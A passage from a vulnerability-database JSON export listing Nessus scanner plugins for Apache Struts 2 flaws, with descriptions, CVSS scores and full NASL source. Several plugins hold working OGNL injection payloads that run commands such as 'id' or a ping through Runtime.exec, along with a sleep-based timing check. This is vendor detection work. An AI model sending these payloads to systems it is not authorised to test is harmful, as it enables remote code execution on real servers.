"vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-09-10T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.14.2 Multiple Vulnerabilities (S2-014)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1966", "CVE-2013-2115"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_2.NASL", "href": "https://www.tenable.com/plugins/nessus/117364", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117364);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-1966\", \"CVE-2013-2115\");\n script_bugtraq_id(60166, 60167);\n\n 
'(\\'\\\\u0023_memberAccess[\\\\\\'allowStaticMethodAccess\\\\\\']\\')(meh)=true&' +\n '(aaa)((\\'\\\\u0023context[\\\\\\'xwork.MethodAccessor.denyMethodExecution\\\\\\']\\\\u003d\\\\u0023foo\\')(\\\\u0023foo\\\\u003dnew%20java.lang.Boolean(%22false%22)))&' +\n '(asdf)((\\'\\\\u0023thread.sleep(' + millis +')\\')(\\\\u0023thread\\\\u003d@java.lang.Thread@currentThread()))=1';\n url = dir + '?' + ognl;\n\n http_set_read_timeout(secs[i] * 2);\n then = unixtime();\n res = http_send_recv3(\n method:'GET',\n item:url,\n port:port,\n exit_on_fail:TRUE\n );\n now = unixtime();\n\n # if it looks like this action isn't vulnerable, move on to checking\n # the next one\n if ( now - then < secs[i] || now - then > (secs[i]+5) ) vuln = FALSE;\n }\n\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nif (report_verbosity > 0)\n{\n report = get_vuln_report(\n header:\n 'Nessus determined a struts 2 application is vulnerable by\\n'+\n 'forcing it to sleep() before sending the server\\'s response.\\n'+\n 'This was verified using the following URL :',\n trailer:\n 'Please note Nessus stopped after detecting the first vulnerable\\n'+\n 'application. Others may be vulnerable.',\n items:url,\n port:port\n );\n security_hole(port:port, extra:report);\n}\nelse security_hole(port);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:59:39", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.2.1. 
It, therefore, is affected by a possible remote code execution vulnerability when OGNL expressions are evaluated due to improper validation by the ParametersInterceptor class.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 5.3, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"}, "published": "2018-09-10T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.2.1 OGNL RCE (S2-005)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-1870"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_2_1.NASL", "href": "https://www.tenable.com/plugins/nessus/117363", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117363);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2010-1870\");\n script_bugtraq_id(41592);\n\n script_name(english:\"Apache Struts 2.x < 2.2.1 OGNL RCE (S2-005)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework\nthat is affected by a possible remote code execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x\nprior to 2.2.1. 
It, therefore, is affected by a possible remote code\nexecution vulnerability when OGNL expressions are evaluated due to\nimproper validation by the ParametersInterceptor class.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.o0o.nu/2010/07/cve-2010-1870-struts2xwork-remote.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwiki.apache.org/confluence/display/WW/S2-005\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.2.1 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2010-1870\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts < 2.2.0 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"White_Phosphorus\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/08/15\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/08/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\n\napp_info = vcf::combined_get_app_info(app:\"Apache Struts\");\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.0.0\", \"max_version\" : \"2.1.8.1\", \"fixed_version\" : \"2.2.1\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 5, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-04-12T15:49:06", "description": "The remote web application appears to use Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. Due to an error in the way that the ExceptionDelegator component handles mismatched data types, an unauthenticated, remote attacker can execute arbitrary commands on the remote host by sending a specially crafted request order. This flaw is due to the ExceptionDelegator interpreting parameter values as OGNL expressions when there is a conversion error. 
\n\nNote that this plugin will only report the first vulnerable instance of a Struts 2 application.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2013-08-07T00:00:00", "type": "nessus", "title": "Apache Struts 2 ExceptionDelegator Arbitrary Remote Command Execution", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0391"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_EXCEPTIONDELEGATOR_COMMAND_EXECUTION.NASL", "href": "https://www.tenable.com/plugins/nessus/69240", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(69240);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2012-0391\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/21\");\n\n script_name(english:\"Apache Struts 2 ExceptionDelegator Arbitrary Remote Command Execution\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote command execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Struts 2, a web framework\nthat utilizes OGNL (Object-Graph Navigation Language) as an expression\nlanguage. Due to an error in the way that the ExceptionDelegator\ncomponent handles mismatched data types, an unauthenticated, remote\nattacker can execute arbitrary commands on the remote host by sending\na specially crafted request order. This flaw is due to the\nExceptionDelegator interpreting parameter values as OGNL expressions\nwhen there is a conversion error. 
\n\nNote that this plugin will only report the first vulnerable instance\nof a Struts 2 application.\");\n # https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20120104-0_Apache_Struts2_Multiple_Critical_Vulnerabilities.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?828dc6d2\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-007.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-008.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.2.3.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-0391\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"D2ExploitPack\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/08/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/09/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/08/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n 
script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"torture_cgi.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 2;\nif(timeout < 10)\n timeout = 
10;\nhttp_set_read_timeout(timeout);\n\nurls = list_uniq(urls);\n\n# Determine which command to execute on target host\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) cmd = 'ipconfig';\n else cmd = 'id';\n\n cmds = make_list(cmd);\n}\nelse cmds = make_list('id', 'ipconfig');\n\nvuln = FALSE;\nforeach url (urls)\n{\n # Grab CGI arguments for each .action file from KB\n cgi_args = get_cgi_arg_list(port:port, cgi:url);\n\n foreach cmd (cmds)\n {\n attack = \"\";\n exploit = \"'+(#_memberAccess[\" + '\"allowStaticMethodAccess\"]=true,' +\n \"@java.lang.Runtime@getRuntime().exec('\" + cmd + \"'))+'\";\n\n # Build a string with all CGI arguments set to the exploit string\n foreach arg (cgi_args)\n {\n attack += arg + \"=\" + exploit + \"&\";\n }\n attack = ereg_replace(string:attack, pattern:\"&$\", replace:\"\");\n attack_url = url + \"?\" + attack;\n\n # Try testing with GET first\n # attack_url should look like this example :\n # /dir/blah.action?param='+(#memberAccess[\"allowStaticMethodAccess\"]=true,\n # @java.lang.Runtime@getRuntime().exec('id'))+'\n res = http_send_recv3(\n method : \"GET\",\n item : attack_url,\n port : port,\n exit_on_fail : TRUE\n );\n\n if (res[2] =~ 'value=\"java\\\\.lang\\\\.(UNIX)?Process(Impl)?@(.+)\" id=')\n {\n vuln = TRUE;\n vuln_url = build_url(qs:attack_url, port:port);\n output = res[2];\n break;\n }\n\n # Else try testing with POST\n attack_post = urlencode(\n str : attack,\n unreserved : \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234\" +\n \"56789=&_.\"\n );\n\n res2 = http_send_recv3(\n method : \"POST\",\n item : url,\n data : attack_post,\n port : port,\n add_headers : make_array(\"Content-Type\",\n \"application/x-www-form-urlencoded\"),\n exit_on_fail : TRUE\n );\n\n if (res2[2] =~ 'value=\"java\\\\.lang\\\\.(UNIX)?Process(Impl)?@(.+)\" id=')\n {\n vuln = TRUE;\n vuln_url = http_last_sent_request();\n output = res2[2];\n break;\n }\n }\n # Stop after first vulnerable 
Struts app is found\n if (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(vuln_url),\n output : chomp(output)\n);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T15:26:51", "description": "The remote web application appears to use Apache Struts 2, a web framework that utilizes OGNL (Object-Graph Navigation Language) as an expression language. A remote code execution vulnerability exists due to double OGNL evaluation of attribute values assigned to certain tags. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to execute arbitrary code.\n\nNote that this plugin only reports the first vulnerable instance of a Struts 2 application.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-03-24T00:00:00", "type": "nessus", "title": "Apache Struts 2 Tag Attribute Double OGNL Evaluation RCE", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-0785"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_28_RCE.NASL", "href": "https://www.tenable.com/plugins/nessus/90152", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90152);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2016-0785\");\n\n script_name(english:\"Apache Struts 2 Tag Attribute Double OGNL Evaluation RCE\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a web application that uses a Java\nframework that is affected by a remote code execution vulnerability.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The remote web application appears to use Apache Struts 2, a web\nframework that utilizes OGNL (Object-Graph Navigation Language) as an\nexpression language. A remote code execution vulnerability exists due\nto double OGNL evaluation of attribute values assigned to certain\ntags. An unauthenticated, remote attacker can exploit this, via a\nspecially crafted request, to execute arbitrary code.\n\nNote that this plugin only reports the first vulnerable instance of a\nStruts 2 application.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/s2-029.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://struts.apache.org/docs/version-notes-2328.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.28 or later. Alternatively, apply\nthe workaround referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-0785\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/03/15\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n 
script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"http_version.nasl\", \"webmirror.nasl\", \"os_fingerprint.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80, 8080);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"torture_cgi.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:8080);\ncgis = get_kb_list('www/' + port + '/cgi');\n\nurls = make_list();\n# To identify actions that we can test the exploit on we will look\n# for files with the .action / .jsp / .do suffix from the KB.\nif (!isnull(cgis))\n{\n foreach cgi (cgis)\n {\n match = pregmatch(pattern:\"((^.*)(/.+\\.act(ion)?)($|\\?|;))\", string:cgi);\n if (match)\n {\n urls = make_list(urls, match[0]);\n if (!thorough_tests) break;\n }\n match2 = pregmatch(pattern:\"(^.*)(/.+\\.jsp)$\", string:cgi);\n if (!isnull(match2))\n {\n urls = make_list(urls, match2[0]);\n if (!thorough_tests) break;\n }\n match3 = pregmatch(pattern:\"(^.*)(/.+\\.do)$\", string:cgi);\n if (!isnull(match3))\n {\n urls = make_list(urls, match3[0]);\n if (!thorough_tests) break;\n }\n if (cgi =~ \"struts2?(-rest)?-showcase\")\n {\n urls = make_list(urls, cgi);\n if (!thorough_tests) break;\n }\n }\n}\n\nif (thorough_tests)\n{\n cgi2 = get_kb_list('www/' + port + '/content/extensions/act*');\n if (!isnull(cgi2)) urls = make_list(urls, cgi2);\n\n cgi3 = get_kb_list('www/' + port + '/content/extensions/jsp');\n if (!isnull(cgi3)) urls = make_list(urls, cgi3);\n\n cgi4 = get_kb_list('www/' + port + '/content/extensions/do');\n if (!isnull(cgi4)) urls = make_list(urls, cgi4);\n}\n\n# Always check web root\nurls = make_list(urls, \"/\");\n\n# Struts is slow\ntimeout = get_read_timeout() * 
2;\nif(timeout < 10)\n timeout = 10;\n\nurls = list_uniq(urls);\nscanner_ip = compat::this_host();\ntarget_ip = get_host_ip();\nvuln = FALSE;\n\nua = get_kb_item(\"global_settings/http_user_agent\");\nif (empty_or_null(ua))\n ua = 'Nessus';\n\npat = hexstr(rand_str(length:10));\n\nos = get_kb_item(\"Host/OS\");\nif (!empty_or_null(os) && \"windows\" >< tolower(os))\n{\n ping_cmd = \"ping -n 3 -l 500 \" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip + \" and greater 500\";\n}\nelse\n{\n ping_cmd = \"ping -c 3 -p \" + pat + \" \" + scanner_ip;\n filter = \"icmp and icmp[0] = 8 and src host \" + target_ip;\n}\n\nping_cmd = urlencode(\n str : ping_cmd,\n unreserved : \"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ01234\" +\n \"56789=&_.\"\n);\n\nforeach url (urls)\n{\n soc = open_sock_tcp(port);\n if (!soc) audit(AUDIT_SOCK_FAIL, port);\n\n # Grab CGI arguments for each .action file from KB\n cgi_args = get_cgi_arg_list(port:port, cgi:url);\n if (empty_or_null(cgi_args))\n {\n url = ereg_replace(pattern:\"\\.(act(ion)?|jsp|do)$\", string:url, replace:\"\");\n cgi_args = get_cgi_arg_list(port:port, cgi:url);\n }\n\n attack = \"\";\n exp_payload = \"%27),%23_memberAccess[%27allowPrivateAccess%27]=true,%23_memberAccess[%27allowProtectedAccess%27]=true,%23_memberAccess[%27allowPackageProtectedAccess%27]=true,%23_memberAccess[%27allowStaticMethodAccess%27]=true,%23_memberAccess[%27excludedPackageNamePatterns%27]=%23_memberAccess[%27acceptProperties%27],%23_memberAccess[%27excludedClasses%27]=%23_memberAccess[%27acceptProperties%27],%23a=@java.lang.Runtime@getRuntime(),%23a.exec(%27\"+ping_cmd+\"%27),new%20java.lang.String(%27\";\n\n # Build a string with CGI arguments set to the exploit string\n if (empty_or_null(cgi_args))\n attack_url = url + \"?\" + exp_payload;\n else\n {\n foreach arg (cgi_args)\n {\n attack += (arg + \"=\" + exp_payload);\n }\n attack_url = url + \"?\" + attack;\n }\n\n # Craft GET request\n get_req =\n 'GET ' + 
attack_url + ' HTTP/1.1\\n' +\n 'Host: ' + target_ip + ':' + port + '\\n' +\n 'User-Agent: ' + ua + '\\n' +\n 'Accept-Language: en-US\\n' +\n 'Connection: Keep-Alive\\n\\n';\n\n s = send_capture(socket:soc,data:get_req,pcap_filter:filter,timeout:timeout);\n icmp = tolower(hexstr(get_icmp_element(icmp:s,element:\"data\")));\n close(soc);\n\n if (\"windows\" >< tolower(os) && !isnull(icmp))\n {\n vuln = TRUE;\n vuln_url = build_url(qs:attack_url, port:port);\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic. '+\n 'Below is the response :' +\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n else if (pat >< icmp)\n {\n vuln = TRUE;\n vuln_url = build_url(qs:attack_url, port:port);\n report =\n '\\nNessus confirmed this issue by examining ICMP traffic and looking for'+\n '\\nthe pattern sent in our packet (' + pat + '). Below is the response :'+\n '\\n\\n' + snip +\n '\\n' + icmp +\n '\\n' + snip +\n '\\n';\n break;\n }\n\n# Stop after first vulnerable Struts app is found\nif (vuln) break;\n}\n\nif (!vuln) exit(0, 'No vulnerable applications were detected on the web server listening on port '+port+'.');\n\nsecurity_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(vuln_url),\n output : report\n);\n", "cvss": {"score": 9, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-04-12T16:58:32", "description": "The version of Apache Struts running on the remote host is 2.x prior to 2.3.14.2. It, therefore, is affected by a remote code execution vulnerability in the URL and Anchor tags due to a flaw in handling the includeParams attribute. 
A remote, unauthenticated attacker can exploit this issue, via a specially crafted request to inject arbitrary OGNL code into the stack and execute arbitrary methods, bypassing Struts and OGNL library protections.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-09-11T00:00:00", "type": "nessus", "title": "Apache Struts 2.x < 2.3.14.2 Remote Code Execution Vulnerability (S2-013)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-1966"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:apache:struts"], "id": "STRUTS_2_3_14_1.NASL", "href": "https://www.tenable.com/plugins/nessus/117401", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(117401);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2013-1966\");\n script_bugtraq_id(60166);\n script_xref(name:\"EDB-ID\", value:\"25980\");\n\n script_name(english:\"Apache Struts 2.x < 2.3.14.2 Remote Code Execution Vulnerability (S2-013)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web application running on the remote host uses a Java framework that is affected by a remote code execution\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache Struts running on the remote host is 2.x prior to 2.3.14.2. It, therefore, is affected by a\nremote code execution vulnerability in the URL and Anchor tags due to a flaw in handling the includeParams attribute. 
A\nremote, unauthenticated attacker can exploit this issue, via a specially crafted request to inject arbitrary OGNL code\ninto the stack and execute arbitrary methods, bypassing Struts and OGNL library protections.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://www.exploit-db.com/exploits/25980\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a3ab6fd3\");\n # https://cwiki.apache.org/confluence/display/WW/S2-013\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0b2a9311\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Struts version 2.3.14.2 or later\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-1966\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache-Struts IncludeParams < 2.3.14.1 RCE Linux\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts includeParams Remote Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/04/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/04/16\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:struts\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"struts_detect_win.nbin\", \"struts_detect_nix.nbin\", \"struts_config_browser_detect.nbin\");\n script_require_ports(\"installed_sw/Apache Struts\", \"installed_sw/Struts\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_info = vcf::combined_get_app_info(app:'Apache Struts');\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { 'min_version' : '2.0.0', 'max_version' : '2.3.14', 'fixed_version' : '2.3.14.2' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-16T14:03:14", "description": "According to its self-reported version, the instance of Apache Archiva hosted on the remote web server is 1.2.x prior than or equal to 1.2.2 or 1.3.x prior than or equal to 1.3.6 and thus is affected by the following vulnerabilities :\n\n - An input 